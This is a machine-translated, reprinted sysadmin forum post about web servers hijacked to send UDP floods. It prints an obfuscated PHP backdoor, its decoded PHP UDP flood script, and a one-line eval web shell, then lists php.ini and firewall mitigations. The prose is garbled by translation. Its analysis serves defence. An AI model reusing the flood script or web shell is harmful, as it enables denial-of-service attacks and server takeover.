Later found in a Web site to find an encrypted. After the decryption to see the familiar UDP is not related? Sure enough, there are friends in this situation, it seems that the ban on external UDP is very necessary,
The following is reprint:
About recent servers suffering from a UDP attack description
Recently, I have one or two servers showing frequent UDP attacks.
Causes the server bandwidth to occupy to 100%, uses the Chinese shield to check the traffic usage to be unable to find out exactly which station was attacked, originally thought is the CC attack, because stopped the IIS bandwidth to be 0, actually is not, is the partial user is invaded caused
Now I'd like to say a little bit about the invasion.
The original code for a PHP page in the user program:
<?php
/*
Gl
*/
Eval (gzinflate Base64_decode ('
Dznhkqniaadv85hpdg4ttgfidrydcrboooevg5gqrpbovh77crmz+f3vp99dofz6bbek/sjoqkntsscpnjkhtf2xw
6zp4cdvibfuzlq1xhqchhdf3z39ldpx33lk9xm78duochekfilo46tqg21dieg+bctz9qw/gd+lmgtthrsmdsemlb
Vkzvpt3s0ums3mdx0wog2ny+gb2l+fufdyzpu6gnjxaysarbsanhimzjbuoqzuy0+lv4h6gztdx9lxke9l29swfgy
Ibuttusopqiri7nfbpdmw0t5ecfwjzmfze2xqermtmlvpoqny436bfrdxk10kyofgawn7s3geqb7rdv7wkxibhzu4
Wyw0lxsmytdcdwk3tojduh1f8cyvsgyuaejeli23cslonsqdsu3gx60zllm5xq9jqhbyq949qvb2us1dqsagpyvfg
3ihy4txaembf2mkky9stkjuddhxfmi3z+ewa7owlgvrxeb5qz4ae2drflaymo6litzoul1gxmlavoldw8/omb7ci1
3dlk1y9xdddgga4onebz0vmx8aswapy6q2jkpo0i8kg1qox7evpgejnsolyzziw8apdl+v0/0fstph3qqi+1qqucw
Xizh1aatmkjitxw5rmz4wyrgmokcutlvau2dle3a85a0gjjqwogx5anhiilqpplj9mdpdqsw9tybo4whccmqjfgou
Sj+rrt+2ok8rbc/ovd47v+j02tay9fkmtp2u8huuo1ezp5f3xcmyl6ftjakw+h+r1ljn0m0nys/txcpey1tyol7aw
E8dp5ygq1vxafoekqd6egdwswmebzsruejiqerbtgx0orpw2cnkoxfs/kdiqauxc26qytlsbeaxiawleq784jjwnu
bv2kpiarl4bmvgnxv+9qwm8j1fvnr1yga9lvsf1hm63tspymtn4k1qfeglvowe93kyhxgbrpnxicopk3oqbb6dl3c
Hsj4owqk4foic2k4mq3tky/vfv78/pz///pr+gfd/'));
After the N-time decryption code:
Copy Code code as follows:
<?php
$packets = 0;
$ip = $_get[\ ' ip\ '];
$rand = $_get[\ ' port\ '];
Set_time_limit (0);
Ignore_user_abort (FALSE);
$exec _time = $_get[\ ' time\ '];
$time = time ();
Print \ "Flooded: $ip on port $rand <br><br>\";
$max _time = $time + $exec _time;
For ($i =0 $i <65535; $i + +) {
$out. = \ "X\";
}
while (1) {
$packets + +;
if (Time () > $max _time) {
Break
}
$fp = Fsockopen (\ "udp://$ip \", $rand, $errno, $ERRSTR, 5);
if ($fp) {
Fwrite ($fp, $out);
Fclose ($FP);
}
}
echo \ "Packet complete at \". Time (\ ' h:i:s\ '). \ "with $packets (\". Round (($packets *65)/1024, 2). \ mB Packets G \ ". Round ($packets/$exec _time, 2). \ "PACKETS/S \\n\";
?>
<?php eval ($_post[ddos])?>
Baidu a little bit work principle:
Put your code in a normal Web page first.
The IP and port is opened via a URL in UDP. pass file to server write.
So the server was recruited.
That is, the server shows UDP attacks, bandwidth consumption is very serious, the basic is 100%, generally hovering between 97%-99%
Solution:
Restrict PHP to network in php.ini.
Set its value to off in php.ini
Allow_url_fopen = Off
And:
; Extension=php_sockets.dll
The front of the number must have, meaning is to limit the use of Sockets.dll
Then restart IIS
I did not close this function, some programs need to look like, directly to the UDP outbound port to seal.
